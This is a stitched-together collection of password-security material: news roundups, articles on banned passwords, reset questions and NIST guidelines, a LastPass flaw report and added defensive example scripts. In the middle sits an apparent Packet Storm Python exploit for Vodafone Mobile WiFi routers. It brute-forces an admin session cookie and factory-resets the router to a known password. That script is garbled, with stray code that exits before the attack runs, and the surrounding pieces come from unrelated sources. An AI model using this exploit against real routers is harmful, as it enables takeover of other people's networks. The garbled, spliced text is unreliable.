Password

Here’s an overview of some of last week’s most interesting news and articles:

Yahoo breach was not state-sponsored, researchers claim
The massive 2014 Yahoo breach isn’t the work of state-sponsored hackers as the company has claimed to believe, say researchers from identity protection and threat intelligence firm InfoArmor. Instead, the breach was effected by a group of professional blackhats believed to be from Eastern Europe.

The psychological reasons behind risky password practices
A Lab42 survey highlights the psychology around why consumers develop poor password habits despite understanding the obvious risk, and suggests that there is a level of cognitive dissonance around our online habits.

Mobile security stripped bare: Why we need to start again
There are three main threat vectors for mobile devices: targeting and intercepting the communications to and from devices; targeting the devices’ external interfaces (Cellular, WiFi, Bluetooth, USB, NFC, Web etc.) for the purpose of device penetration and planting malicious code; and targeting the data on the device and the resources/functions the device/underlying OS provides access to such as microphone, camera, GPS, etc.

ICS-CERT releases new tools for securing industrial control systems
The Industrial Control Systems Cyber Emergency Response Team (ICS-CERT) has published newer versions of two tools that can help administrators with securing industrial control systems: the Cyber Security Evaluation Tool (CSET), and a whitepaper on recommended practices for improving ICS cybersecurity with defense-in-depth strategies.

OS analysis tool osquery finally available for Windows
Nearly two years after Facebook open sourced osquery, the social networking giant has made available an osquery developer kit for Windows, allowing security teams to build customized solutions for Windows networks.

DefecTor: DNS-enhanced correlation attacks against Tor users
A group of researchers from Princeton University, Karlstad University and KTH Royal Institute of Technology have devised two new correlation attacks that can be leveraged to deanonymize Tor users.

Incident response survival guide
Here are some steps that will allow organizations to minimize the damage when a security breach occurs.

D-Link DWR-932 router is chock-full of security holes
Security researcher Pierre Kim has unearthed a bucketload of vulnerabilities affecting the LTE router/portable wireless hotspot D-Link DWR-932. Among these are backdoor accounts, weak default PINs, and hardcoded passwords.

Enhance iMessage security using Confide
One of the new features in iOS 10 offers the possibility of deploying specially crafted applications within iMessage. Most users will probably (ab)use this new functionality for sending tiresome animations and gestures, but some applications can actually provide added value for iMessage communication.

Why digital hoarding poses serious financial and security risks
82 percent of IT decision makers admit they are hoarders of data and digital files. These include: unencrypted personal records, job applications to other companies, unencrypted company secrets and embarrassing employee correspondence.

Clear and present danger: Combating the email threat landscape
As long as organisations use email to send and receive files, malicious email attachments will continue to plague corporate inboxes.

Europol identifies eight main cybercrime trends
A significant proportion of cybercrime activity still involves the continuous recycling of relatively old techniques, security solutions for which are available but not widely adopted.

Microsoft equips Edge with hardware-based container
Windows Defender Application Guard is a lightweight virtual machine that prevents malicious activity coming from the web from reaching the operating system, apps, data, and the enterprise network.

Rise of the drones: Managing a new risk environment
More drones in the skies raise a number of new safety concerns, ranging from collisions and crashes to cyber-attacks and terrorism.

Swiss voters approve new surveillance law
The Swiss Federal Intelligence Service will now be able to bug private property, phone lines, and wiretap computers (under certain conditions).

IoT-based DDoS attacks on the rise
As attackers are now highly aware of insufficient IoT security, many pre-program their malware with commonly used and default passwords, allowing them to easily hijack IoT devices. Poor security on many IoT devices makes them easy targets, and often victims may not even know they have been infected.

Public safety threat: Cyber attacks targeting smart city services
A new survey conducted by Dimensional Research assessed cyber security challenges associated with smart city technologies.


Help Net Security

Microsoft recently announced that it would begin banning weak passwords for a variety of its services and also introduced a feature called Smart Password Lockout to prevent attackers from guessing passwords. How is Microsoft banning these weak passwords, and how does the Smart Password Lockout work? Will these things benefit enterprises or just complicate matters?

Stealing passwords is big business in the world of cybercrime. One Russian hacker known as the Collector has recently been offering more than 250 million stolen usernames and passwords for Mail.ru, Yahoo Mail, Gmail, Hotmail and other accounts. Another hacker nicknamed Peace is advertising for sale a database of 167 million emails and hashed passwords belonging to LinkedIn users. As many people use the same username and password for multiple sites, their credentials can potentially provide easy access to social media accounts, online banking services and enterprise networks and resources. According to Microsoft's Security Intelligence Report Volume 20, it detects more than 10 million credential attacks every day across its various identity systems.

When these big password lists come onto the market, they are analyzed both by cybercriminals and by security teams, such as Microsoft's Azure Active Directory Identity Protection team -- everyone is looking to see which passwords are the most common. Microsoft is using this information to dynamically update its banned list of common and similar weak passwords. Now, before a user's proposed password is accepted for her Microsoft Account or in Azure AD, it's compared against this list to ensure it's not present. If it is on the list, the user is prompted to choose a password that's harder for other people to guess. Preventing users from choosing common, easy-to-guess passwords reduces the chances of their passwords being cracked by a rainbow table or a dictionary-based brute-force attack.

On top of this feature, Microsoft is also introducing Smart Password Lockout to reduce the disruption caused by hackers trying to guess an account password online and triggering an account lockdown. When Microsoft's security system detects someone trying to guess a password online, it will only lock out that specific login session. This means when the genuine user tries to log in, the account is not locked, and as long as she enters the correct username and password, she can access her account. This will save huge amounts of time and frustration given the millions of attacks that occur each day. The only time a genuine user will be locked out is if someone is judged to be trying to guess her password while using the user's own machine or network.

Although many policies and online services try to enforce strong passwords by requiring users to choose a password with a minimum length and complexity, Microsoft has found that this forces people to standardize their passwords in order to remember them, making it easier for hackers to crack them. Preventing users from choosing common weak passwords will certainly improve the effectiveness of many password policies by ensuring passwords are more unique, and therefore harder to guess. Although these security features will certainly help improve password security, some users may struggle to remember harder passwords.

As bad passwords are a major weakness in endpoint security, enterprises should be moving to multifactor authentication (MFA), particularly when users need to access sensitive resources or information. MFA makes it a lot harder for a hacker to use stolen credentials to gain access to endpoint devices and the rest of the network. The presence of high quality cameras, microphones and fingerprint readers in many of today's devices means it's never been easier to implement. The FIDO specification supports a wide range of authentication technologies, including biometrics, USB security tokens and smart cards that can be deployed without extensive programming. Hopefully these technologies will help end the role of the password as the primary authentication factor.
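The lockout behaviour described above can be compared with classic account-wide lockout in a few lines. This is an added example, not Microsoft's implementation: the `LockoutTracker` class, the threshold of five failures, the 300-second lock and the use of a source address to tell login sessions apart are all assumptions made for illustration.

```python
from collections import defaultdict

MAX_FAILURES = 5     # assumed threshold; the article gives no number
LOCK_SECONDS = 300   # assumed lock duration


class LockoutTracker:
    """Counts failed logins and locks a key after max_failures failures.

    scope="account": one counter per account (classic account lockout).
    scope="source":  one counter per (account, source) pair, so only the
                     guessing source is locked, as the article describes.
    """

    def __init__(self, scope, max_failures=MAX_FAILURES, lock_seconds=LOCK_SECONDS):
        if scope not in ("account", "source"):
            raise ValueError("scope must be 'account' or 'source'")
        self.scope = scope
        self.max_failures = max_failures
        self.lock_seconds = lock_seconds
        self.failures = defaultdict(int)
        self.locked_until = {}

    def _key(self, account, source):
        return account if self.scope == "account" else (account, source)

    def attempt(self, account, source, password_ok, now):
        """Return 'locked', 'ok' or 'denied' for one login attempt."""
        key = self._key(account, source)
        if self.locked_until.get(key, 0) > now:
            return "locked"  # rejected before the password is considered
        if password_ok:
            self.failures.pop(key, None)
            return "ok"
        self.failures[key] += 1
        if self.failures[key] >= self.max_failures:
            self.locked_until[key] = now + self.lock_seconds
            self.failures.pop(key, None)
        return "denied"


def simulate(scope, guesser_source, user_source, guesses=10):
    """Wrong guesses from guesser_source, then the real user logs in."""
    tracker = LockoutTracker(scope)
    for t in range(guesses):
        tracker.attempt("alice", guesser_source, password_ok=False, now=t)
    return tracker.attempt("alice", user_source, password_ok=True, now=guesses)


if __name__ == "__main__":
    # Constructed addresses from the documentation ranges (RFC 5737).
    remote, home = "203.0.113.7", "198.51.100.20"
    print("account-wide, remote guesser:          ", simulate("account", remote, home))
    print("source-scoped, remote guesser:         ", simulate("source", remote, home))
    print("source-scoped, guesser on user network:", simulate("source", home, home))
```

With account-wide counting the remote guesser locks the genuine user out; with source-scoped counting she is locked out only when the guessing comes from her own source, which matches the exception the article notes.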

Ask the Expert: Want to ask Michael Cobb a question about application security? Submit your questions now via email. (All questions are anonymous.)


This was first published in September 2016


SearchSecurity: Security Wire Daily News

A quick fix for stupid password reset questions

It didn’t take 500 million hacked Yahoo accounts to make me hate, hate, hate password reset questions (otherwise known as knowledge-based authentication or KBA). It didn't help when I heard that password reset questions and answers -- which are often identical, required, and reused on other websites -- were compromised in that massive hack, too. 

Is there any security person or respected security guidance that likes them? They are so last century. What is your mother’s maiden name? What is your favorite color? What was your first pet’s name?


The “hardest” (if I can use that term) questions may have up to 100 or 200 possible answers, and only if you aren’t forced to choose predefined answers. Thanks to the advent of social media and online (often illegal) record-check websites, these questions aren’t difficult to guess.

The weakest links

For decades we've known that password reset questions were the weakest link within any authentication system. Hackers love them. While they may supposedly protect passwords with a decent level of complexity and entropy, a KBA question answer almost always lacks both.

You probably remember the Sarah Palin email hack. The convicted hacker described hacking the KBA questions as so easy that he couldn’t call it hacking -- apparently, he used a Wikipedia article to find Palin's birth date, a common security question at the time. Mitt Romney’s account got compromised due to knowledge of his favorite animal.

Even very good security researchers and reporters get KBA-hacked. No matter how good you are at security, you’re left with no security if a website requires you to use weak KBA questions and answers.

What to do when you're forced to use KBA

Millions of websites and services often require that we use KBA systems. If you want an account, you must supply at least one (often three) KBA answers (sometimes questions, too).

Here’s what you do: Treat the KBA answers like a password. If you’re asked for three KBA questions and answers, make all the answers separate, nonsensical, and passwordlike.

Never put in the real answer. Don’t even put in possible fake answers that look realistic. A hacker will have an easier time guessing that your favorite answer is aardvark than SimpleMan7!.

What I’m saying is to invent separate “passwords” for each KBA question, and make sure you don’t repeat them between websites or services (although I am OK with using the same KBA password answer for all questions on the same site if allowed). In my experience, most websites requiring KBA answers don’t track to see if your answers are unique between questions, but about 25 percent do.

You don’t want to use the same KBA answers between different sites -- if one website gets owned (like Yahoo did back in 2014 … and you’re finding out about it now), the attacker might try using your KBA on other websites they haven’t hacked. That's what I'd do if I were a malicious hacker.

Yes, this means you have to write down your KBA questions and answers for each website, in the same way you might already store your current passwords. Hopefully you never store your password in complete, plaintext form, although I guess you'd have to do so with password storage methods that autofill your answer. I don’t trust password storage systems any more than I do KBAs.

Most sources that recommend stronger KBA answers also suggest using answers that hackers would never guess. That’s not enough. You need to make sure the answers aren’t anywhere near any possible real response (for example, a complex string of characters) and remember not to reuse them between websites.

I know it’s a pain, so remind those websites what century we're in and make them start using two-factor authentication instead. That way your embarrassing pictures or personal emails won't end up on the web because your provider was horrible at security.


Pokémon GO Spam, Ransomware, On the Rise

August 17, 2016 , 12:58 pm

500 Million Yahoo Accounts Stolen By State-Sponsored Hackers

September 22, 2016 , 3:47 pm

Yahoo Reportedly to Confirm Breach of Hundreds of Millions of Credentials

September 22, 2016 , 12:31 pm

Experts Want Transparency From Government’s Vulnerabilities Equities Process

September 20, 2016 , 2:41 pm

Bruce Schneier on Probing Attacks Testing Core Internet Infrastructure

September 15, 2016 , 11:15 am

Generic OS X Malware Detection Method Explained

September 13, 2016 , 9:14 am

Patched Android Libutils Vulnerability Harkens Back to Stagefright

September 9, 2016 , 2:06 pm

Chrome to Label Some HTTP Sites ‘Not Secure’ in 2017

September 8, 2016 , 3:43 pm

Threatpost News Wrap, September 2, 2016

September 2, 2016 , 9:00 am

Insecure Redis Instances at Core of Attacks Against Linux Servers

September 1, 2016 , 1:08 pm

Dropbox Forces Password Reset for Older Users

August 29, 2016 , 9:58 am

Cisco Begins Patching Equation Group ASA Zero Day

August 24, 2016 , 5:53 pm

New Collision Attacks Against 3DES, Blowfish Allow for Cookie Decryption

August 24, 2016 , 8:00 am

Cisco Acknowledges ASA Zero Day Exposed by ShadowBrokers

August 17, 2016 , 4:06 pm

ProjectSauron APT On Par With Equation, Flame, Duqu

August 8, 2016 , 1:40 pm

Miller, Valasek Deliver Final Car Hacking Talk

August 4, 2016 , 3:26 pm

Researchers Go Inside a Business Email Compromise Scam

August 4, 2016 , 10:00 am

Export-Grade Crypto Patching Improves

August 3, 2016 , 10:00 am

Kaspersky Lab Launches Bug Bounty Program

August 2, 2016 , 9:00 am

Threatpost News Wrap, July 29, 2016

July 29, 2016 , 10:45 am

KeySniffer Vulnerability Opens Wireless Keyboards to Snooping

July 26, 2016 , 9:30 am

Upcoming Tor Design Battles Hidden Services Snooping

July 25, 2016 , 3:51 pm

EFF Files Lawsuit Challenging DMCA’s Restrictions on Security Researchers

July 21, 2016 , 1:18 pm

Oracle Patches Record 276 Vulnerabilities with July Critical Patch Update

July 20, 2016 , 9:21 am

Threatpost News Wrap, July 15, 2016

July 15, 2016 , 11:00 am

Academics Build Early-Warning Ransomware Detection System

July 14, 2016 , 1:05 pm

xDedic Hacked Server Market Resurfaces on Tor Domain

July 12, 2016 , 11:40 am

Conficker Used in New Wave of Hospital IoT Device Attacks

June 30, 2016 , 11:48 am

655,000 Healthcare Records Being Sold on Dark Web

June 28, 2016 , 10:00 am

Windows Zero Day Selling for $90,000

May 31, 2016 , 5:44 pm

Millions of Stolen MySpace, Tumblr Credentials Being Sold Online

May 31, 2016 , 1:37 pm

OTR Protocol Patched Against Remote Code Execution Flaw

March 10, 2016 , 10:23 am

New Gmail Alerts Warn of Unauthenticated Senders

August 11, 2016 , 2:10 pm

New Trojan SpyNote Installs Backdoor on Android Devices

July 29, 2016 , 12:21 pm

Keystroke Recognition Uses Wi-Fi Signals To Snoop

August 25, 2016 , 2:19 pm

Critical MySQL Vulnerability Disclosed

September 12, 2016 , 11:00 am

PLC-Blaster Worm Targets Industrial Control Systems

August 5, 2016 , 4:49 pm

Android Patch Fixes Nexus 5X Critical Vulnerability

September 2, 2016 , 12:49 pm

Browser Address Bar Spoofing Vulnerability Disclosed

August 17, 2016 , 12:54 pm


Threatpost | The first stop for security news

import urllib2
import json
from datetime import datetime, timedelta
import time
import httplib
from threading import Thread
from Queue import Queue
from multiprocessing import process

print """
Vodafone Mobile WiFi - Password reset exploit (Daniele Linguaglossa)
"""
thread_lock = False
session = ""
def unix_time_millis(dt):
    epoch = datetime.utcfromtimestamp(0)
    return int(((dt - epoch).total_seconds() * 1000.0) / 1000)

a=False

def check_process_output():
    print 1

p = process.Process(target=check_process_output)
p.start()

print a
exit(0)

def crack(queue):
    global thread_lock
    global session
    while True:
        if thread_lock:
            exit(0)
        if not queue.empty():
            cookie = queue.get()
            headers = {'Referer': 'http://192.168.0.1/home.htm', 'Cookie': "stok=%s" % cookie}
            req = urllib2.Request("http://192.168.0.1/goform/goform_get_cmd_process?cmd=AuthMode&_=%s"
                                  % time.time(), None, headers)
            result = urllib2.urlopen(req).read()
            if json.loads(result)["AuthMode"] != "":
                print "[+] Found valid admin session!"
                print "[INFO] Terminating other threads ... please wait"
                session = cookie
                queue.task_done()
                thread_lock = True

def start_threads_with_args(target, n, arg):
    thread_pool = []
    for n_threads in range(0, n):
        thread = Thread(target=target, args=(arg,))
        thread_pool.append(thread)
        thread_pool[-1].start()
    return thread_pool

def start_bruteforce():
    global session
    global thread_lock
    queue = Queue(0)
    start_threads_with_args(crack, 15, queue)
    print"[!] Trying fast bruteforce..."
    for x in range(0, 1000):
        if thread_lock:
            break
        queue.put("123abc456def789%03d" % x)
    while True:
        if session != "":
            return session
        if queue.empty():
            break
    print "[!] Trying slow bruteforce..."
    for milliseconds in range(0, how_many):
        if thread_lock:
            break
        queue.put("123abc456def789%s" % (start + milliseconds))
    while True:
        if session != "":
            return session
        if queue.empty():
            break
    return session
if __name__ == "__main__":
    now = datetime.now()
    hours = raw_input("How many hours ago admin logged in: ")
    minutes = raw_input("How many minutes ago admin logged in: ")
    init = datetime(now.year, now.month, now.day, now.hour, now.minute) - timedelta(hours=int(hours), minutes=int(minutes))
    end = datetime(now.year, now.month, now.day, 23, 59, 59, 999999)
    start = unix_time_millis(init)
    how_many = unix_time_millis(end) - start + 1
    print "[+] Starting session bruteforce with 15 threads"
    valid_session = ""
    try:
        valid_session = start_bruteforce()
    except KeyboardInterrupt:
        print "[-] Exiting.."
        thread_lock = True
        exit(0)
    if valid_session == "":
        print "[!] Can't find valid session :( quitting..."
        exit(0)
    print "[+] Resetting router password to 'admin' , network may be down for a while"
    headers = {'Referer': 'http://192.168.0.1/home.htm', 'Cookie': "stok=%s" % valid_session}
    req = urllib2.Request("http://192.168.0.1/goform/goform_set_cmd_process",
                          "goformId=RESTORE_FACTORY_SETTINGS&_=%s" % time.time(), headers)
    try:
        urllib2.urlopen(req).read()
    except httplib.BadStatusLine:
        print "[!] Password resetted to admin! have fun!"
        exit(0)
    except Exception:
        print "[x] Error during password reset"
    print "[-] Can't reset password try manually, your session is: %s" % valid_session


Exploit Files ≈ Packet Storm

It’s no secret. We’re really bad at passwords. Nevertheless, they aren’t going away any time soon.

With so many websites and online applications requiring us to create accounts and think up passwords in a hurry, it’s no wonder so many of us struggle to follow the advice of so-called password security experts.

At the same time, the computing power available for password cracking just gets bigger and bigger.

OK, so I started with the bad news, but this cloud does have a silver lining.

It doesn’t need to be as hard as we make it and the government is here to help.

That’s right, the United States National Institute for Standards and Technology (NIST) is formulating new guidelines for password policies to be used in the whole of the US government (the public sector).

Why is this important? Because the policies are sensible and a great template for all of us to use within our own organizations and application development programs.

Anyone interested in the draft specification for Special Publication 800-63-3: Digital Authentication Guidelines can review it as it evolves over on Github.

For a more human approach, security researcher Jim Fenton did a presentation earlier this month at the PasswordsCon event in Las Vegas that sums up the changes nicely.

What’s new?

What are the major differences between current received wisdom about “secure passwords” and what NIST is now recommending?

Some of the recommendations you can probably guess; others may surprise you.

We’ll start with the things you should do.

Favor the user. To begin with, make your password policies user friendly and put the burden on the verifier when possible.

In other words, we need to stop asking users to do things that aren’t actually improving security.

Much research has gone into the efficacy of many of our so-called “best practices” and it turns out they don’t help enough to be worth the pain they cause.

Size matters. At least it does when it comes to passwords. NIST’s new guidelines say you need a minimum of 8 characters. (That’s not a maximum minimum – you can increase the minimum password length for more sensitive accounts.)

Better yet, NIST says you should allow a maximum length of at least 64, so no more “Sorry, your password can’t be longer than 16 characters.”

Applications must allow all printable ASCII characters, including spaces, and should accept all Unicode characters, too, including emoji!

This is great advice, and considering that passwords must be hashed and salted when stored (which converts them to a fixed-length representation) there shouldn’t be unnecessary restrictions on length.

We often advise people to use passphrases, so they should be allowed to use all common punctuation characters and any language to improve usability and increase variety.

Check new passwords against a dictionary of known-bad choices. You don’t want to let people use ChangeMe, thisisapassword, yankees, and so on.

More research needs to be done into how to choose and use your “banned list,” but Jim Fenton thinks that 10,000 entries is a good starting point.

The don’ts

Now for all the things you shouldn’t do.

No composition rules. What this means is, no more rules that force you to use particular characters or combinations, like those daunting conditions on some password reset pages that say, “Your password must contain one lowercase letter, one uppercase letter, one number, four symbols but not &%#@_, and the surname of at least one astronaut.”

Let people choose freely, and encourage longer phrases instead of hard-to-remember passwords or illusory complexity such as pA55w+rd.

No password hints. None. If I wanted people to have a better chance at guessing my password, I’d write it on a note attached to my screen.

People set password hints like “rhymes with assword” when you allow hints. (Really! We have some astonishing examples from Adobe’s 2013 password breach.)

Knowledge-based authentication (KBA) is out. KBA is when a site says, “Pick from a list of questions – Where did you attend high school? What’s your favourite football team? – and tell us the answer in case we ever need to check that it’s you.”

No more expiration without reason. This is my favourite piece of advice: If we want users to comply and choose long, hard-to-guess passwords, we shouldn’t make them change those passwords unnecessarily.

The only time passwords should be reset is when they are forgotten, if they have been phished, or if you think (or know) that your password database has been stolen and could therefore be subjected to an offline brute-force attack.

There’s more…

NIST also provides some other very worthwhile advice.

All passwords must be hashed, salted and stretched, as we explain in our article How to store your users’ password safely.

You need a salt of 32 bits or more, a keyed HMAC hash using SHA-1, SHA-2 or SHA-3, and the “stretching” algorithm PBKDF2 with at least 10,000 iterations.

Password hashing enthusiasts are probably wondering, “What about bcrypt and scrypt?” In our own How to article, we listed both of these as possibilities, but wrote, “We’ll recommend PBKDF2 here because it is based on hashing primitives that satisfy many national and international standards.” NIST followed the same reasoning.
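The acceptance rules from the "do" and "don't" lists and the storage advice above fit together in one verifier. This is an added example, not code from NIST or from the article: the function names, the five-entry banned list, the 256-character cap, the 128-bit salt, the record format and the NFKC normalization step are assumptions chosen for illustration.

```python
import hashlib
import hmac
import secrets
import unicodedata

MIN_LENGTH = 8              # minimum length given in the article
MAX_LENGTH = 256            # verifier's cap (assumption); must be at least 64
PBKDF2_ITERATIONS = 10_000  # the article's floor; tune upward for your hardware
SALT_BYTES = 16             # 128 bits, above the 32-bit minimum

# Constructed sample list; the article suggests about 10,000 entries.
BANNED = {"changeme", "thisisapassword", "yankees", "password", "12345678"}


def normalize(password):
    # NFKC so the same passphrase typed on different keyboards hashes alike
    # (added here; the article does not discuss normalization).
    return unicodedata.normalize("NFKC", password)


def check_new_password(password, banned=BANNED):
    """Return a list of rejection reasons; an empty list means accepted.

    There are deliberately no composition rules and no character
    restrictions: spaces, punctuation and any Unicode text are allowed.
    """
    pw = normalize(password)
    reasons = []
    if len(pw) < MIN_LENGTH:
        reasons.append("shorter than %d characters" % MIN_LENGTH)
    if len(pw) > MAX_LENGTH:
        reasons.append("longer than %d characters" % MAX_LENGTH)
    if pw.casefold() in banned:
        reasons.append("on the banned list")
    return reasons


def hash_password(password, iterations=PBKDF2_ITERATIONS):
    """Salt, hash and stretch with PBKDF2-HMAC-SHA256; returns a text record."""
    salt = secrets.token_bytes(SALT_BYTES)
    digest = hashlib.pbkdf2_hmac(
        "sha256", normalize(password).encode("utf-8"), salt, iterations)
    return "pbkdf2_sha256$%d$%s$%s" % (iterations, salt.hex(), digest.hex())


def verify_password(password, record):
    """Recompute the hash from the stored salt and compare in constant time."""
    scheme, iterations, salt_hex, digest_hex = record.split("$")
    if scheme != "pbkdf2_sha256":
        return False
    candidate = hashlib.pbkdf2_hmac(
        "sha256", normalize(password).encode("utf-8"),
        bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(candidate, bytes.fromhex(digest_hex))


if __name__ == "__main__":
    for pw in ("ChangeMe", "short", "correct horse battery staple"):
        print(repr(pw), "->", check_new_password(pw) or "accepted")
    record = hash_password("correct horse battery staple")
    print(record)
    print(verify_password("correct horse battery staple", record))
```

Because the stored value is a fixed-length digest, the length cap exists only to bound hashing work, not to fit a database column.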

Additionally, and this is a big change: SMS should no longer be used in two-factor authentication (2FA).

There are many problems with the security of SMS delivery, including malware that can redirect text messages; attacks against the mobile phone network (such as the so-called SS7 hack); and mobile phone number portability.

Phone ports, also known as SIM swaps, are where your mobile provider issues you a new SIM card to replace one that’s been lost, damaged, stolen or that is the wrong size for your new phone.

In many countries it is unfortunately far too easy for criminals to convince a mobile phone store to transfer someone’s phone number to a new SIM, thereby hijacking all their text messages.

What next?

This is just the tip of the iceberg, but certainly some of the most important bits.

Password policies need to evolve as we learn more about how people use and abuse them.

Sadly there have been more than enough breaches for us to see the impacts of certain types of policy, such as the evidence shown above from Adobe’s 2013 hack about the danger of password hints.

NIST’s goal is to get us to protect ourselves reliably without unneeded complexity, because complexity works against security.

What are your thoughts on these changes? Will you implement them for your organization? Tell us in the comments.



Information Security Podcasts

Even password manager LastPass can be fooled. A Google security researcher has found a way to remotely hijack the software.

It works by first luring the user to a malicious site. The site will then exploit a flaw in a LastPass add-on for the Firefox browser, giving it control over the password management software.


LastPass wrote about the vulnerability on Wednesday and said that a fix is already out for Firefox users.

Google security researcher Tavis Ormandy first discovered the issue. When examining the password manager, he tweeted on Tuesday, "Are people really using this lastpass thing? I took a quick look and can see a bunch of obvious critical problems. I'll send a report asap."

Any vulnerability with LastPass could pose a big risk for users. The popular software is supposed to securely store and autofill all the passwords users have for their different sites.

Ormandy isn't the only security researcher to find flaws with the password manager. On Wednesday, Mathias Karlsson at Detectify Labs said that he had also managed to hack LastPass -- in this case, to steal user passwords.

He did so by exploiting a bug in the password manager's Chrome browser extension, Karlsson
InfoWorld Security

Oct 30 2015   7:24PM GMT

Ken Harthun

Tags: Password policies



Security Corner

Nov 11 2015   2:47PM GMT

Ken Harthun

Tags: humor, MEME, Password



Security Corner